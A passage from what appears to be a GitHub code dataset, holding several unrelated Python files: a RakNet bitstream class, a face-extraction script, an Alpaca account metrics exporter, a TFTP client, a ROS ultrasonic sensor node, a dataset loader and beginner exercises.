str_\r\n\r\n\t\tif length_type is not None:\r\n\t\t\t# Variable-length string\r\n\t\t\tself.write(length_type(len(str_))) # note: there's also a version that uses the length of the encoded string, should that be used?\r\n\t\telse:\r\n\t\t\t# Fixed-length string\r\n\t\t\t# null terminator\r\n\t\t\tif isinstance(str_, str):\r\n\t\t\t\tchar_size = 2\r\n\t\t\telse:\r\n\t\t\t\tchar_size = 1\r\n\r\n\t\t\tif len(encoded_str)+char_size > allocated_length:\r\n\t\t\t\traise ValueError(\"String too long!\")\r\n\t\t\tencoded_str += bytes(allocated_length-len(encoded_str))\r\n\t\tself._write_bytes(encoded_str)\r\n\r\n\tdef _write_bit(self, bit):\r\n\t\tself._alloc_bits(1)\r\n\t\tif bit: # we don't actually have to do anything if the bit is 0\r\n\t\t\tself[self._write_offset//8] |= 0x80 >> self._write_offset % 8\r\n\r\n\t\tself._write_offset += 1\r\n\r\n\tdef write_bits(self, value, number_of_bits):\r\n\t\tassert 0 < number_of_bits < 8\r\n\t\tself._alloc_bits(number_of_bits)\r\n\r\n\t\tif number_of_bits < 8: # In the case of a partial byte, the bits are aligned from the right (bit 0) rather than the left (as in the normal internal representation)\r\n\t\t\tvalue = value << (8 - number_of_bits) & 0xff # Shift left to get the bits on the left, as in our internal representation\r\n\t\tif self._write_offset % 8 == 0:\r\n\t\t\tself[self._write_offset//8] = value\r\n\t\telse:\r\n\t\t\tself[self._write_offset//8] |= value >> self._write_offset % 8 # First half\r\n\t\t\tif 8 - self._write_offset % 8 < number_of_bits: # If we didn't write it all out in the first half (8 - self._write_offset % 8 is the number we wrote in the first half)\r\n\t\t\t\tself[self._write_offset//8 + 1] = (value << 8 - self._write_offset % 8) & 0xff # Second half (overlaps byte boundary)\r\n\r\n\t\tself._write_offset += number_of_bits\r\n\r\n\tdef _write_bytes(self, byte_arg):\r\n\t\tif self._write_offset % 8 == 0:\r\n\t\t\tself[self._write_offset//8:self._write_offset//8+len(byte_arg)] = byte_arg\r\n\t\telse:\r\n\t\t\t# shift new input to current shift\r\n\t\t\tnew = (int.from_bytes(byte_arg, \"big\") << (8 - self._write_offset % 8)).to_bytes(len(byte_arg)+1, \"big\")\r\n\t\t\t# update current byte\r\n\t\t\tself[self._write_offset//8] |= new[0]\r\n\t\t\t# add rest\r\n\t\t\tself[self._write_offset//8+1:self._write_offset//8+1+len(byte_arg)] = new[1:]\r\n\t\tself._write_offset += len(byte_arg)*8\r\n\r\n\tdef _write_compressed(self, byte_arg):\r\n\t\tcurrent_byte = len(byte_arg) - 1\r\n\r\n\t\t# Write upper bytes with a single 1\r\n\t\t# From high byte to low byte, if high byte is 0 then write 1. Otherwise write 0 and the remaining bytes\r\n\t\twhile current_byte > 0:\r\n\t\t\tis_zero = byte_arg[current_byte] == 0\r\n\t\t\tself._write_bit(is_zero)\r\n\t\t\tif not is_zero:\r\n\t\t\t\t# Write the remainder of the data\r\n\t\t\t\tself._write_bytes(byte_arg[:current_byte + 1])\r\n\t\t\t\treturn\r\n\t\t\tcurrent_byte -= 1\r\n\r\n\t\t# If the upper half of the last byte is 0 then write 1 and the remaining 4 bits. Otherwise write 0 and the 8 bits.\r\n\r\n\t\tis_zero = byte_arg[0] & 0xF0 == 0x00\r\n\t\tself._write_bit(is_zero)\r\n\t\tif is_zero:\r\n\t\t\tself.write_bits(byte_arg[0], 4)\r\n\t\telse:\r\n\t\t\tself._write_bytes(byte_arg[:1])\r\n\r\n\tdef align_write(self):\r\n\t\tif self._write_offset % 8 != 0:\r\n\t\t\tself._alloc_bits(8 - self._write_offset % 8)\r\n\t\t\tself._write_offset += 8 - self._write_offset % 8\r\n\r\n\tdef _alloc_bits(self, number_of_bits):\r\n\t\tbytes_to_allocate = math.ceil((self._write_offset + number_of_bits) / 8) - len(self)\r\n\t\tif bytes_to_allocate > 0:\r\n\t\t\tself += bytes(bytes_to_allocate)\r\n\r\n\r\n\tdef skip_read(self, byte_length):\r\n\t\tself._read_offset += byte_length * 8\r\n\r\n\tdef read(self, arg_type, compressed=False, length:\"for BitStream (in bits) and for bytes (in bytes)\"=None, allocated_length:\"for fixed-length strings\"=None, length_type:\"for variable-length strings\"=None):\r\n\t\tif isinstance(arg_type, struct.Struct):\r\n\t\t\tif compressed:\r\n\t\t\t\tif arg_type in (c_float, c_double):\r\n\t\t\t\t\traise NotImplementedError\r\n\t\t\t\tread = self._read_compressed(arg_type.size)\r\n\t\t\telse:\r\n\t\t\t\tread = self._read_bytes(arg_type.size)\r\n\t\t\treturn arg_type.unpack(read)[0]\r\n\t\tif issubclass(arg_type, c_bit):\r\n\t\t\treturn self._read_bit()\r\n\t\tif allocated_length is not None or length_type is not None:\r\n\t\t\treturn self._read_str(arg_type, allocated_length, length_type)\r\n\t\tif issubclass(arg_type, bytes):\r\n\t\t\treturn self._read_bytes(length)\r\n\t\tif issubclass(arg_type, BitStream):\r\n\t\t\tr = self._read_offset\r\n\t\t\toutput = BitStream(self._read_bytes(length//8))\r\n\t\t\tif length % 8 != 0:\r\n\t\t\t\tendbyte = (self[self._read_offset//8] << self._read_offset % 8) & 0xff\r\n\t\t\t\tif self._read_offset % 8 != 0 and length % 8 > 8 - self._read_offset % 8:\r\n\t\t\t\t\tendbyte |= self[self._read_offset//8 + 1] >> 8 - self._read_offset % 8\r\n\t\t\t\tendbyte &= ~((1 << 8-length%8)-1)\r\n\t\t\t\toutput._write_bytes(bytes([endbyte]))\r\n\t\t\t\toutput._write_offset -= 8 - length % 8\r\n\t\t\t\tself._read_offset += length % 8\r\n\t\t\treturn output\r\n\t\traise TypeError(arg_type)\r\n\r\n\tdef _read_str(self, arg_type, allocated_length, length_type):\r\n\t\tif issubclass(arg_type, str):\r\n\t\t\tchar_size = 2\r\n\t\telse:\r\n\t\t\tchar_size = 1\r\n\r\n\t\tif length_type is not None:\r\n\t\t\t# Variable-length string\r\n\t\t\tlength = self.read(length_type)\r\n\t\t\tbyte_str = self.read(bytes, length=length*char_size)\r\n\t\telse:\r\n\t\t\t# Fixed-length string\r\n\t\t\tbyte_str = bytearray()\r\n\t\t\twhile len(byte_str) < allocated_length:\r\n\t\t\t\tchar = self._read_bytes(char_size)\r\n\t\t\t\tif sum(char) == 0:\r\n\t\t\t\t\tself.skip_read(allocated_length - len(byte_str) - char_size)\r\n\t\t\t\t\tbreak\r\n\t\t\t\tbyte_str += char\r\n\r\n\t\tif issubclass(arg_type, str):\r\n\t\t\treturn byte_str.decode(\"utf-16-le\")\r\n\t\treturn byte_str\r\n\r\n\tdef _read_bit(self):\r\n\t\tbit = self[self._read_offset//8] & 0x80 >> self._read_offset % 8 != 0\r\n\t\tself._read_offset += 1\r\n\t\treturn bit\r\n\r\n\tdef read_bits(self, number_of_bits):\r\n\t\tassert 0 < number_of_bits < 8\r\n\r\n\t\toutput = (self[self._read_offset//8] << self._read_offset % 8) & 0xff # First half\r\n\t\tif self._read_offset % 8 != 0 and number_of_bits > 8 - self._read_offset % 8: # If we have a second half, we didn't read enough bytes in the first half\r\n\t\t\toutput |= self[self._read_offset//8 + 1] >> 8 - self._read_offset % 8 # Second half (overlaps byte boundary)\r\n\t\toutput >>= 8 - number_of_bits\r\n\t\tself._read_offset += number_of_bits\r\n\t\treturn output\r\n\r\n\tdef _read_bytes(self, length):\r\n\t\tif self._read_offset % 8 == 0:\r\n\t\t\toutput = self[self._read_offset//8:self._read_offset//8+length]\r\n\t\telse:\r\n\t\t\toutput = self[self._read_offset//8:self._read_offset//8+length+1]\r\n\t\t\t# clear the part before the struct\r\n\t\t\toutput[0] &= (1 << 8-self._read_offset%8) - 1\r\n\t\t\t# shift back\r\n\t\t\toutput = (int.from_bytes(output, \"big\") >> (8-self._read_offset%8)).to_bytes(length, \"big\")\r\n\t\tself._read_offset += length*8\r\n\t\treturn output\r\n\r\n\tdef _read_compressed(self, number_of_bytes):\r\n\t\tcurrent_byte = number_of_bytes - 1\r\n\r\n\t\twhile current_byte > 0:\r\n\t\t\tif self._read_bit():\r\n\t\t\t\tcurrent_byte -= 1\r\n\t\t\telse:\r\n\t\t\t\t# Read the rest of the bytes\r\n\t\t\t\treturn bytearray(number_of_bytes - current_byte - 1) + self._read_bytes(current_byte + 1)\r\n\r\n\t\t# All but the first bytes are 0. If the upper half of the last byte is a 0 (positive) or 16 (negative) then what we read will be a 1 and the remaining 4 bits.\r\n\t\t# Otherwise we read a 0 and the 8 bits\r\n\t\tif self._read_bit():\r\n\t\t\tstart = bytes([self.read_bits(4)])\r\n\t\telse:\r\n\t\t\tstart = self._read_bytes(1)\r\n\t\treturn start + bytearray(number_of_bytes - current_byte - 1)\r\n\r\n\tdef align_read(self):\r\n\t\tif self._read_offset % 8 != 0:\r\n\t\t\tself._read_offset += 8 - self._read_offset % 8\r\n\r\n\tdef all_read(self):\r\n\t\t# This is not accurate to the bit, just to the byte\r\n\t\treturn math.ceil(self._read_offset / 8) == len(self)\r\n","repo_name":"cmarshall108/pyraknet","sub_path":"pyraknet/bitstream.py","file_name":"bitstream.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"31998907153","text":"\"\"\"\nThis module contains the extract function and its supporting functions.\n\nThe following steps are performed in the extract function:\n\n1. Get a list of all the folders present in the data directory. The name of each folder is the name of the person or the class.\n2. For each folder, get a list of all the files present in the folder. We are interested in video and image files.\n3. Extract faces from videos and images of each person/class and save them in a folder with the name of the person/class.\n4. Repeat steps 1-3 for all the folders present in the data directory.\n\"\"\"\n\nimport os\nimport cv2\nfrom tqdm import tqdm\nimport sys\n\n# Get the absolute path of the parent directory of the script\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# Add the parent directory to sys.path\nsys.path.append(parent_dir)\n\nfrom Common.FaceExtractor import FaceExtractor\n\n\ndef extract_faces_from_directory(\n directory_path: str,\n output_directory_path: str,\n method: str = \"dlib\",\n size: tuple = (128, 128),\n) -> None:\n \"\"\"\n Extract faces from images and videos in a directory using the selected face detection method.\n Saves the extracted faces to a folder with the name of the person/class in the specified output directory.\n\n Args:\n directory_path (str): The path to the directory containing the images and videos.\n output_directory_path (str): The path to the directory where the extracted faces should be saved.\n method (str): The face detection method to use. Available options are 'dlib' and 'opencv'.\n Default is 'dlib'.\n \"\"\"\n # Create a FaceExtractor object\n face_extractor = FaceExtractor(method=method)\n\n # Iterate over the folders in the directory\n for folder_name in os.listdir(directory_path):\n folder_path = os.path.join(directory_path, folder_name)\n\n # Check if the path is a directory\n if os.path.isdir(folder_path):\n print(f\"Extracting faces from {folder_name}...\")\n\n # Create a folder to save the extracted faces\n output_folder = os.path.join(output_directory_path, f\"{folder_name}\")\n os.makedirs(output_folder, exist_ok=True)\n\n # Iterate over the files in the folder\n # tqdm is used to display a progress bar\n\n for file_name in tqdm(os.listdir(folder_path), leave=False):\n file_path = os.path.join(folder_path, file_name)\n\n # Check if the path is a file\n if os.path.isfile(file_path):\n # Get the file extension\n file_ext = os.path.splitext(file_name)[1]\n\n # Extract faces from images and videos\n if file_ext in [\".jpg\", \".jpeg\", \".png\"]:\n image = cv2.imread(file_path)\n faces = face_extractor.extract_faces_from_image(\n image, size=size\n )\n elif file_ext in [\n \".mp4\",\n \".avi\",\n \".mov\",\n \".mkv\",\n \".flv\",\n \".wmv\",\n \".webm\",\n ]:\n faces = face_extractor.extract_faces_from_video(\n file_path, frame_skip=15, size=size\n )\n\n # Save the extracted faces to the output folder\n for i, face in enumerate(faces):\n output_path = os.path.join(\n output_folder, f\"{file_name}_{i}.jpg\"\n )\n cv2.imwrite(output_path, face)\n\n\ndef extract(\n input_dir: str, output_dir: str, method: str = \"dlib\", size: tuple = (128, 128)\n) -> None:\n extract_faces_from_directory(input_dir, output_dir, method, size=size)\n","repo_name":"ibadrather/WhoDat","sub_path":"ELT_Pipeline/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12410811350","text":"from prometheus_client import start_http_server, Summary, Gauge\nimport logging, requests, json, yaml\nimport os\nimport time\nimport sys\n\nUPDATE_PERIOD = int(os.environ.get('UPDATE_INTERVAL'))\n\nBALANCE = Gauge('balance',\n 'Hold current account balances',\n ['balance_type'])\n\ndef main():\n start_http_server(int(os.environ.get('PORT')))\n\n while True:\n # call the alpaca API and get account data\n a = requests.get(ACCOUNT_URL, headers=HEADERS)\n account_data = json.loads(a.content)\n\n equity = float(account_data['last_equity'])\n cash = float(account_data['buying_power'])\n\n BALANCE.labels('EQUITY').set(equity)\n BALANCE.labels('BUYING_POWER').set(cash)\n time.sleep(UPDATE_PERIOD)\n\nif __name__ == '__main__':\n try:\n with open('config.yml') as f:\n config_data = yaml.safe_load(f)\n\n alpaca_data = config_data.get(\"alpaca\", {})\n \n API_KEY = alpaca_data.get(\"API_KEY\", \"\")\n SECRET_KEY = alpaca_data.get(\"SECRET_KEY\", \"\")\n BASE_URL = alpaca_data.get(\"BASE_URL\", \"\")\n\n ORDERS_URL = \"{}/v2/orders\".format(BASE_URL)\n ACCOUNT_URL = \"{}/v2/account\".format(BASE_URL)\n POSITION_URL = \"{}/v2/positions\".format(BASE_URL)\n HEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n\n main()\n\n except Exception as e:\n print(e)\n sys.exit()","repo_name":"GoldUniform/alpaca-stack","sub_path":"account_exporter/account_exporter.py","file_name":"account_exporter.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36857528663","text":"import Audio\nimport Graficos\n\nprint('\\t\\t\\tFREQUENCIA DE BATIDA E INTERFERENCIA DE ONDA\\n')\nprint('NESTE SCRIPT ESTAO DISPONIVEIS AS OPCOES DE VISUALIZACAO DE GRAFICOS E EXECUCAO DE SONS DE SINAIS SENOIDAIS, DADAS DUAS FREQUENCIAS.')\n\nkey = 1\nwhile key ==1:\n choice = int(input('DESEJA VER OS GRAFICOS (1) OU OUVIR OS SINAIS (2)? 3 PARA SAIR\\n'))\n if choice == 1:\n Graficos.iniciaGraficos()\n elif choice == 2:\n Audio.Inicia()\n elif choice == 3:\n key = 0\n\n#Audio.Inicia()\n#Graficos.iniciaGraficos()\n","repo_name":"JhusNeto/beat-frequency-generator","sub_path":"FINAL.py","file_name":"FINAL.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38761984038","text":"import socket\nimport struct\nimport time\n\n'''\n https://tools.ietf.org/html/rfc1350\n\n opcode operation\n 1 Read request (RRQ)\n 2 Write request (WRQ)\n 3 Data (DATA)\n 4 Acknowledgment (ACK)\n 5 Error (ERROR)\n\n'''\n\nUDP_IP = \"127.0.0.1\"\nUDP_PORT = 69\nFILENAME = \"sample.txt\"\n\nprint(\"UDP target IP: %s\"%UDP_IP)\nprint(\"UDP target port: %d\"%UDP_PORT)\nprint(\"message: %s\"%FILENAME)\n\nFN = bytes(FILENAME.encode('ascii'))\nMODE = bytes('netascii'.encode('ascii'))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP\n\nsock.bind((UDP_IP, 0)) #zero significa qualquer\nRCV_PORT = sock.getsockname()[1] #obtem a porta selecionada\n\nMSG = struct.pack(\">H%dsB%dsB\"%(len(FN),len(MODE)),1,FN,0,MODE,0)\nsock.sendto(MSG, (UDP_IP, UDP_PORT))\n\ntime.sleep(2)\n\ndata, addr = sock.recvfrom(512)\nprint(data)\nprint(len(data))\n\nOPTO,BLK_N,FILE_RCV = struct.unpack('>HH%ds'%(len(data)-4),data)\nprint('opto code: %d'%OPTO)\nprint('block number: %d'%BLK_N)\nprint('file: %s'%FILE_RCV)\n\n#MSG = struct.pack(\">HH\",3,BLK_N)\n#sock.sendto(MSG, (UDP_IP, UDP_PORT))\n\n\n","repo_name":"rogerioicestacio/redes","sub_path":"tftp_client.py","file_name":"tftp_client.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3764403537","text":"#!/usr/bin/env python\nimport time\nimport math\n\ntry:\n import RPi.GPIO as GPIO\nexcept ImportError:\n from crues import GPIO_MOCK as GPIO\n\nimport rospy\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import LaserScan\n\n# Approx. speed of sound at 20C in m/s\nSPEED_OF_SOUND = 343\n\n\nclass UltrasonicTimeout(Exception):\n \"\"\"Error for indicating that an ultrasonic sensor has timed out (e.g. because GPIO missed an edge).\"\"\"\n\n def __init__(self, name, timeout, is_on_rising_edge):\n if is_on_rising_edge:\n msg = \"%s ultrasonic sensor timed out after %f s\" % (name, timeout)\n else:\n msg = \"%s ultrasonic sensor missed rising edge\" % name\n super(UltrasonicTimeout, self).__init__(msg)\n self.name = name\n self.timeout = timeout\n self.is_on_rising_edge = is_on_rising_edge\n\n\nclass Ultrasonic:\n def __init__(self, name, trig_pin, echo_pin, sensor_timeout, pulse_duration=0.00001, response=1.0, offset=0.0):\n self.name = name\n self.trig_pin = trig_pin\n self.echo_pin = echo_pin\n self.sensor_timeout = sensor_timeout\n self.pulse_duration = pulse_duration\n self.start_time = -1\n self.stop_time = -1\n self.response = response\n self.offset = offset\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(trig_pin, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(echo_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(echo_pin, GPIO.BOTH, callback=self._log_time)\n\n def get_range(self):\n \"\"\"Get range from ultrasonic sensor in metres.\n\n :return: (float) Approx. range in metres\n :except: (UltrasonicTimeout) If module timed out waiting for GPIO input change\n \"\"\"\n self.start_time = -1\n self.stop_time = -1\n GPIO.output(self.trig_pin, GPIO.HIGH)\n time.sleep(self.pulse_duration)\n GPIO.output(self.trig_pin, GPIO.LOW)\n time.sleep(self.sensor_timeout)\n if self.start_time < 0 or self.stop_time < 0:\n raise UltrasonicTimeout(self.name, self.sensor_timeout, self.start_time < 0)\n duration = self.stop_time - self.start_time\n distance = duration * SPEED_OF_SOUND * 0.5\n return self.response * distance - self.offset\n\n def _log_time(self, _):\n if GPIO.input(self.echo_pin):\n self.start_time = time.time()\n else:\n self.stop_time = time.time()\n\n def cleanup(self):\n GPIO.cleanup([self.trig_pin, self.echo_pin])\n\n\nclass UltrasonicScanner:\n def __init__(self):\n rospy.init_node(\"ultrasonic\")\n self.time_increment = rospy.get_param('~scan_increment', 0.05)\n timeout = self.time_increment * 0.9\n self.angle_min = rospy.get_param('~angle_min', -math.pi / 6)\n self.angle_max = rospy.get_param('~angle_max', math.pi / 6)\n self.angle_increment = rospy.get_param('~angle_increment', math.pi / 6)\n self.offset_centre = rospy.get_param('~offset_scan_centre', 0.127)\n self.offset_outer = rospy.get_param('~offset_scan_outer', 0.121)\n self.range_min = rospy.get_param('~range_min', 0) + self.offset_outer\n self.range_max = rospy.get_param('~range_max', 1.0) + self.offset_outer\n self.scan_frame_id = rospy.get_param('~scan_frame_id', 'us_scan_frame')\n self.left = Ultrasonic(\"Left\", rospy.get_param('pins/ult'), rospy.get_param('pins/ule'), timeout,\n response=rospy.get_param('~response_left', 1.0),\n offset=rospy.get_param('~offset_left', 0.02))\n self.centre = Ultrasonic(\"Centre\", rospy.get_param('pins/uct'), rospy.get_param('pins/uce'), timeout,\n response=rospy.get_param('~response_centre', 1.0),\n offset=rospy.get_param('~offset_centre', 0.02))\n self.right = Ultrasonic(\"Right\", rospy.get_param('pins/urt'), rospy.get_param('pins/ure'), timeout,\n response=rospy.get_param('~response_right', 1.0),\n offset=rospy.get_param('~offset_right', 0.02))\n f = rospy.get_param('~rate', 5)\n self.rate = rospy.Rate(f)\n self.scan_time = 1.0 / f\n self.pulse_offset = rospy.get_param('~pulse_offset', 0)\n self.pub_l = rospy.Publisher('ul_range', Float32, queue_size=10)\n self.pub_c = rospy.Publisher('uc_range', Float32, queue_size=10)\n self.pub_r = rospy.Publisher('ur_range', Float32, queue_size=10)\n self.scan_pub = rospy.Publisher('sonar_scan', LaserScan, queue_size=10)\n\n def _duration_till_next_tick(self):\n now = rospy.get_time()\n next_tick = math.floor(now) + self.pulse_offset\n while next_tick < now:\n next_tick += self.scan_time\n return next_tick - now\n\n def spin(self):\n try:\n while not rospy.is_shutdown():\n self._scan()\n rospy.sleep(self._duration_till_next_tick())\n finally:\n self.left.cleanup()\n self.centre.cleanup()\n self.right.cleanup()\n\n def _scan(self):\n start = time.time()\n stamp = rospy.Time.now()\n range_r = self._publish_range(self.right, self.pub_r)\n time_remaining = start + self.time_increment - time.time()\n if time_remaining > 0:\n time.sleep(time_remaining)\n range_c = self._publish_range(self.centre, self.pub_c)\n time_remaining = start + 2 * self.time_increment - time.time()\n if time_remaining > 0:\n time.sleep(time_remaining)\n range_l = self._publish_range(self.left, self.pub_l)\n self._publish_scan(range_r, range_c, range_l, stamp)\n\n def _publish_scan(self, range_r, range_c, range_l, timestamp):\n scan = LaserScan()\n scan.header.stamp = timestamp\n scan.header.frame_id = self.scan_frame_id\n scan.scan_time = self.scan_time\n scan.angle_min = self.angle_min\n scan.angle_max = self.angle_max\n scan.angle_increment = self.angle_increment\n scan.range_min = self.range_min\n scan.range_max = self.range_max\n scan.time_increment = self.time_increment\n scan.ranges = [range_r + self.offset_outer, range_c + self.offset_centre, range_l + self.offset_outer]\n scan.intensities = []\n self.scan_pub.publish(scan)\n\n @staticmethod\n def _publish_range(sensor, pub):\n r = -1000\n try:\n r = sensor.get_range()\n except UltrasonicTimeout as e:\n if e.is_on_rising_edge:\n rospy.logerr(str(e))\n else:\n rospy.logwarn(str(e))\n else:\n rospy.logdebug(\"%s ultrasonic node range: %d\", sensor.name, r)\n finally:\n pub.publish(r)\n return r\n\n\nif __name__ == '__main__':\n try:\n scanner = UltrasonicScanner()\n scanner.spin()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"rddunphy/CRUES","sub_path":"crues_pi/ros_pkgs/crues_sensors/scripts/us_node.py","file_name":"us_node.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"31817571502","text":"import json\n\n# Исходная структура JSON\nsource_json = {\n \"sn1.1:0.1\": \"Saṁyutta Nikāya 1.1\",\n \"sn1.1:0.2\": \"1. Naḷavagga\",\n \"sn1.1:0.3\": \"Oghataraṇasutta\",\n \"sn1.1:1.1\": \"Evaṁ me sutaṁ—\",\n \"sn1.1:1.2\": \"ekaṁ samayaṁ bhagavā sāvatthiyaṁ viharati jetavane anāthapiṇḍikassa ārāme.\"\n}\n\n# Преобразование в желаемую структуру JSON\nresult_json = {\n \"textID\": \"sn1.1\",\n \"text\": [\n {\"lineID\": key, \"line\": value.strip()} for key, value in source_json.items()\n ]\n}\n\n# Вывод результата в виде JSON\nprint(json.dumps(result_json, ensure_ascii=False, indent=2))\n\n","repo_name":"o28o/fdg","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10335481668","text":"import torch\nimport tops\nimport numpy as np\nimport io\nimport webdataset as wds\nimport os\nfrom ..utils import png_decoder, get_num_workers, collate_fn\n\n\ndef kp_decoder(x):\n # Keypoints are between [0, 1] for webdataset\n keypoints = torch.from_numpy(np.load(io.BytesIO(x))).float().view(7, 2).clamp(0, 1)\n keypoints = torch.cat((keypoints, torch.ones((7, 1))), dim=-1)\n return keypoints\n\n\ndef bbox_decoder(x):\n return torch.from_numpy(np.load(io.BytesIO(x))).float().view(4)\n\n\nclass BBoxToMask:\n\n def __call__(self, sample):\n imsize = sample[\"image.png\"].shape[-1]\n bbox = sample[\"bounding_box.npy\"] * imsize\n x0, y0, x1, y1 = np.round(bbox).astype(np.int64)\n mask = torch.ones((1, imsize, imsize), dtype=torch.bool)\n mask[:, y0:y1, x0:x1] = 0\n sample[\"mask\"] = mask\n return sample\n\n\ndef get_dataloader_fdf_wds(\n path,\n batch_size: int,\n num_workers: int,\n transform: torch.nn.Module,\n gpu_transform: torch.nn.Module,\n infinite: bool,\n shuffle: bool,\n partial_batches: bool,\n sample_shuffle=10_000,\n tar_shuffle=100,\n channels_last=False,\n ):\n # Need to set this for split_by_node to work.\n os.environ[\"RANK\"] = str(tops.rank())\n os.environ[\"WORLD_SIZE\"] = str(tops.world_size())\n if infinite:\n pipeline = [wds.ResampledShards(str(path))]\n else:\n pipeline = [wds.SimpleShardList(str(path))]\n if shuffle:\n pipeline.append(wds.shuffle(tar_shuffle))\n pipeline.extend([\n wds.split_by_node,\n wds.split_by_worker,\n ])\n if shuffle:\n pipeline.append(wds.shuffle(sample_shuffle))\n\n decoder = [\n wds.handle_extension(\"image.png\", png_decoder),\n wds.handle_extension(\"keypoints.npy\", kp_decoder),\n ]\n\n rename_keys = [\n [\"img\", \"image.png\"],\n [\"keypoints\", \"keypoints.npy\"],\n [\"__key__\", \"__key__\"],\n [\"mask\", \"mask\"]\n ]\n\n pipeline.extend([\n wds.tarfile_to_samples(),\n wds.decode(*decoder),\n ])\n pipeline.append(wds.map(BBoxToMask()))\n pipeline.extend([\n wds.batched(batch_size, collation_fn=collate_fn, partial=partial_batches),\n wds.rename_keys(*rename_keys),\n ])\n\n if transform is not None:\n pipeline.append(wds.map(transform))\n pipeline = wds.DataPipeline(*pipeline)\n if infinite:\n pipeline = pipeline.repeat(nepochs=1000000)\n\n loader = wds.WebLoader(\n pipeline, batch_size=None, shuffle=False,\n num_workers=get_num_workers(num_workers),\n persistent_workers=True,\n )\n loader = tops.DataPrefetcher(loader, gpu_transform, channels_last=channels_last, to_float=False)\n return loader\n","repo_name":"hukkelas/deep_privacy2","sub_path":"dp2/data/datasets/fdf128_wds.py","file_name":"fdf128_wds.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"54"} +{"seq_id":"7156052440","text":"import fileinput\n\n\ndumbos = []\n\nfor next_line in fileinput.input():\n dumbos.append(list(map(lambda c: int(c), list(next_line.rstrip()))))\n\n\ndef add(y: int, x: int) -> int:\n dumbos[y][x] += 1\n if dumbos[y][x] == 10:\n return flash(y = y, x = x)\n return 0\n\n\ndef flash(y: int, x: int) -> int:\n f = 1\n if y > 0:\n if x > 0:\n f += add(y = y - 1, x = x - 1)\n f += add(y = y - 1, x = x)\n if x < 9:\n f += add(y = y - 1, x = x + 1)\n if x > 0:\n f += add(y = y, x = x - 1)\n if x < 9:\n f += add(y = y, x = x + 1)\n if y < 9:\n if x > 0:\n f += add(y = y + 1, x = x - 1)\n f += add(y = y + 1, x = x)\n if x < 9:\n f += add(y = y + 1, x = x + 1)\n return f\n\n\nflashes = 0\n\nfor step in range(100):\n for y in range(10):\n for x in range(10):\n flashes += add(y = y, x = x)\n\n for y in range(10):\n for x in range(10):\n if dumbos[y][x] > 9:\n dumbos[y][x] = 0\n\nprint(flashes)","repo_name":"generalpf/advent-of-code-2021","sub_path":"day/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43079361471","text":"# <<<<<<<<<<<<<<<<<<<<<<<Conditionals And Loops>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#<----------------------------Control System-------------------------->\n'''\nThey Allow us to control the flow of our programm\n\n'''\n\n#<--------------------------Conditional Statement------------------------>\n\n'''\nif, if-else\nnested\nElse ifladder\nTernary\nswitch\n\n#<------------------------------IF ELSE---------------------------------->\nif condition;\n Statement1!\nelse\n Statement2!\n\n\n <---------elif----------->\n\n\nif condition;\n Statement1!\nelif\n Statement2!\nelse\n Statement3!\n\n\n \n\n\n\n\n\n'''\n\n#<------------------------------IF ELSE---------------------------------->\n#Ques1: Take integer input and tell if it is positive or negative\n\n'''\nnumber = int(input(\"Enter a number:\"))\nif number >=0:\n print(\"The number is Positive\")\nelse:\n print(\"The number is negative\")\n7\n'''\n\n\n#Ques2: Take a integer input an tell if it is even or odd\n# so we have taken input already\n\n'''\n\nif number%2 ==1:\n print(\"Number is odd\")\nelse:\n print(\"Number is even\")\n\n'''\n\n\n#Ques3: Teke cost price and selling price of an item and determine how much profit or loss incurred\n\n'''\n\ncostPrice = float(input(\"Enter the cost Price:\"))\nsellingPrice = float(input(\"Enter the Selling Price:\"))\n\nPL = sellingPrice - costPrice\n\nif PL==0:\n print(\"No profit No Loss\")\nelif PL > 0:\n print(\"Your Profit is:\", PL)\nelse:\n print(\"Your Loss is:\", PL)\n\n'''\n\n\n#Ques4 input percentage of a student and print the Grade according to marks:81-100=VeryGood, 61-80=Good,41-60= Average <=40 Fail\n\n'''\n\nPercentageOfStudent = float(input(\"Enter the percentage of the student:\"))\n\nif PercentageOfStudent >=80:\n print(\"Your Grade is: Very Good\")\nelif PercentageOfStudent >=60:\n print(\"Your Grade is: Good\" )\nelif PercentageOfStudent >=41:\n print(\"Your Grade is: Average\" )\nelse:\n print(\"Your are Fail\" )\n\n'''\n\n#<----------------------------MULTIPLE CONDITION USING \"and\" and \"or\"------------------------------>\n#Ques5: \n\n\n\n# engMarks = int(input(\"Enter marks in english: \"))\n# mathMarks = int(input(\"Enter marks in Math: \"))\n\n# if engMarks>80 and mathMarks>80:\n# print(\"Your Grade is: A \")\n# elif engMarks>80 or mathMarks >80:\n# print(\"Your Grade is: 